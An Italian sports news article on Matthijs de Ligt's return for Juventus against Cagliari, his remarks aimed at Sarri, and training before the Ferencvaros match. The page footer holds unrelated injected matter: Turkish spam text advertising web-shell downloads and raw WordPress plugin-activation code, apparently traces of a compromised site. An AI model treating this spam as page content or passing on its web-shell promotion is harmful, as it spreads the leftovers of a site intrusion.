Juve, De Ligt is back. E Pirlo gongola…


Il muro olandese, ieri col Cagliari, ha giocato dopo tre mesi di stop. Il risultato? Sembra che lui sia sempre stato in campo. E lancia una frecciata a Sarri: “Ho visto una mentalità diversa rispetto all’anno scorso. Mi piace…”

De Ligt is back! Il muro olandese ieri è tornato in campo dopo tre mesi di stop per l’intervento alla spalla. Il risultato? Una prova da 7. Impeccabile. Insomma, sembra quasi che Matthijs sia sempre stato in campo. E Pirlo gongola. Eh sì, perché lo si è visto nella vittoria col Cagliari, con lui la squadra è più corta, più propensa ad anticipare a centrocampo e anche la fase d’impostazione, quella che parte da dietro, sembra più fluida. Per capirci, ieri la sua percentuale di passaggi riusciti ha superato dil 92 per cento. Ma c’è di più. Perché il 21 enne De Ligt ha saputo aiutare e far emergere anche il 22enne Demiral. I due, che insieme avevano giocato solo 14′ e mai da titolari, hanno dato prova di grande affiatamento. E solidità.

frecciatina a sarri?

—  

E a Matthijs è tornato il sorriso. Ora, parole sue, si diverte: “Con Pirlo c’è un calcio più moderno – ha detto -. Ho visto una mentalità diversa rispetto all’anno scorso. Difendiamo uno contro uno con molto spazio dietro, mi piace giocare così perché lo facevo già all’Ajax”, parole che suonano come una frecciata nemmeno tanto velata all’ex tecnico Maurizio Sarri. E poi: “Che bello tornare, vincere e avere di nuovo questa sensazione. Grazie a tutti coloro che mi hanno aiutato e sostenuto”.

squadra oggi a lavoro

—  

Intanto, oggi la Juventus è subito tornata al lavoro per preparare le gara interna di Champions League contro il Ferencvaros, in programma martedì alle 21. Il gruppo si è diviso fra scarico in palestra, (per i protagonisti di ieri) e lavoro in campo (possessi, esercitazioni tecnico tattiche e partitella) per quelli che non hanno giocato. Destava un po’ di preoccupazione la condizione di Demiral, uscito malconcio dopo la sfida dello Stadium. Ma alla Continassa filtra ottimismo: il turco dovrebbe farcela. Pirlo ha programmato, per domani mattina, un’altra sessione di allenamento.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );